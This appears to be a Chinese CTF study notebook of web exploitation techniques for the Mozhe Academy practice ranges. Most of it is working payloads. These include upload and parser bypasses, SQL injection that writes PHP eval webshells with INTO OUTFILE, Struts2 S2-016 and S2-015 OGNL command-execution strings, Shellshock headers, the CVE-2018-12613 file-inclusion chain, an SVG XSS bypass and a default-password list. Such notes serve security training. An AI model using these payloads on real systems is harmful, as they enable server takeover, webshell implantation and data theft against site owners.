ctf筆記(墨者學院) 19.8.11-19.8.27

本期筆記以墨者學院的靶場爲主

文件上傳漏洞
當php上傳失敗後，可考慮是否對後綴名進行過濾（改後綴名爲php五、php3）
iis6解析漏洞：當上傳到目錄爲/*.asp時，任何文件皆解析爲asp，能夠上傳asp形式的圖馬或txt馬，鏈接（鏈接時直接連便可）

SQL注入
數字型注入：無單引號
字符型注入：前有單引號後有註釋符，萬能密碼' or '1'='1 除外
盲注：
可用工具、程序、burp爆破來輔助
正則注入
1 and 1=(select 1 from information_schema.tables where table_schema='xxx' and table_name regexp '^us[a-z]' limit 0,1)
注意：正則匹配全部項，與常規盲注的limit n,1不一樣，正則是不須要改的
一樣，用like相似正則
select user() like 'ro%'

弱口令
admin admin/admin admin888/admin 123456/admin 域名/test test/test test123

文件解析漏洞
目錄解析
/xx.asp/webshell.jpg
/xx.asa/webshell.jpg
文件解析
webshell.asp;jpg 適用於iis6
Apache解析漏洞
test.php.xxx.yyy x和y皆爲沒法識別的後綴名
copy xx.jpg /b + yy.txt /a xy.jpg 圖馬->構造sp.jpg,寫入<?PHP fputs(fopen('payload.php','w'),' <?php eval($_POST[hehe])?>');?>,訪問sp.jpg/.php 適用於Fast-CGI開啓 0x02 IIS 7.0/IIS 7.5/ Nginx版本<=8.03
/xx.jpg%00.php 在Fast-CGI關閉的狀況下，Nginx <=0.8.37
罕見後綴
php族 phtml、pht、php三、php四、php五、pyc和pyo
.htaccess利用
.htaccess文件若是能夠上傳且能覆蓋原有配置，文件寫入配置<FilesMatch "1"> SetHandler application/x-httpd-php </FilesMatch>
生效條件：Apache的配置文件中寫上：AllowOverride All
加載mod_Rewrite模塊，在Apache的配置文件中寫上：LoadModule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so
(Ubuntu中還須要) sudo a2enmod rewrite
利用
MIME類型修改：.htaccess中寫： AddType application/x-httpd-php
或寫<FilesMatch "shell.jpg">SetHandler application/x-httpd-php</FilesMatch>，可以使shell.jpg解析爲php
或寫<FilesMatch "hello"> SetHandler application/x-httpd-php </FilesMatch>，只要包含hello就會被解析爲php

sql寫shell
1' union select 1,'<?php eval($_POST[a]);?>' into outfile '/var/www/tmp/a.php'# 用into outfile將一句話木馬寫成php，前提：知道網站絕對路徑 一句話木馬部分轉hex
絕對路徑 能夠在寫into outfile時虛構一個路徑來爆出真的路徑
bypass 空格繞過 好比屏蔽union 可改寫爲un union ion

struct2 s2-16漏洞
找action，而後構造如下代碼（以index.action，redirect命令爲例，代碼做用爲執行攻擊命令並下載文件到本地）
index.action?redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'ls','\'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}
new java.lang.String[]{'ls','\'}爲攻擊命令
對於 index.action?redirect: 後面的內容，有可能須要進行url轉碼
下列代碼可用於回顯網站絕對路徑
index.action?redirect:${#a=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#b=#a.getSession(),#c=#b.getServletContext(),#d=#c.getRealPath("/"),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#d),#matt.getWriter().flush(),#matt.getWriter().close()}
以上代碼均爲ONGL表達式

bash 遠程執行命令漏洞
找/cgi-bin/x.cgi 或直接找到cgi 用搜索引擎
利用漏洞() { :;}; + 命令執行 (用burp抓包，將此語句放入connection或user-agent)
命令示例:
() { :;}; echo; /bin/bash -c 'cat /key.txt'
() { :;}; echo; /bin/ls /
echo;是爲了閉合函數

svn源碼泄漏漏洞
/.svn/entries 顯示網站目錄數
/.svn/wc.db 可下載數據庫，用數據庫軟件如SQLiteStudio打開（或者更名爲txt嘗試用notpad++打開），而後尋找key

bypass 0day
<svg><script xlink:href=data:,alert(1)></script></svg> 利用svg標籤進行繞過

php後臺文件包含漏洞 CVE-2018-12613
前提：登陸後臺
打開SQL，寫select '<?php phpinfo()?>;'
burp抓包，記錄下cookie（phpMyAdmin=xxx）
利用文件包含漏洞
index.php?target=db_sql.php%253f/../../../../../../../../../../../tmp/sess_+以前記錄的cookie
（Macos的session保存目錄爲/var/tmp/，Linux的session保存目錄爲/var/lib/php/sessions）
在phpinfo中尋找path，找網站的絕對路徑
例:/var/www/html/
則經過sql into outfile的方式寫馬:
select '<?php @eval($_POST[a])?>;' into outfile '/var/www/html/a.php'

HTTP頭注入(X-Forwarded-for)
抓包，發送至repeater，寫入X-Forwarded-For:or 1=1
若是報錯則存在注入
而後進行常規的sql注入（order by...union select...）

struct2 s2-04漏洞
利用方式：/struts/../ 對目錄進行回溯
bypass：url編碼 ..%2f，若沒法正常回顯則嘗試二次url編碼 ..%252f

struct2 s2-15漏洞
檢驗：/${1+1}.action，被執行則存在漏洞
exp:${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls').getInputStream()),#q}.action
bypass:url編碼

參數提交：
/?+參數 可向網站提交參數，提交方式可用burp進行修改

文件讀取
例：index.php?jpg=hei.jpg，改寫爲index.php?jpg=index.php可讀取index.php的內容

Created by PhpStorm
phpStorm會自動生成.idea文件，其中會包含一組xml文件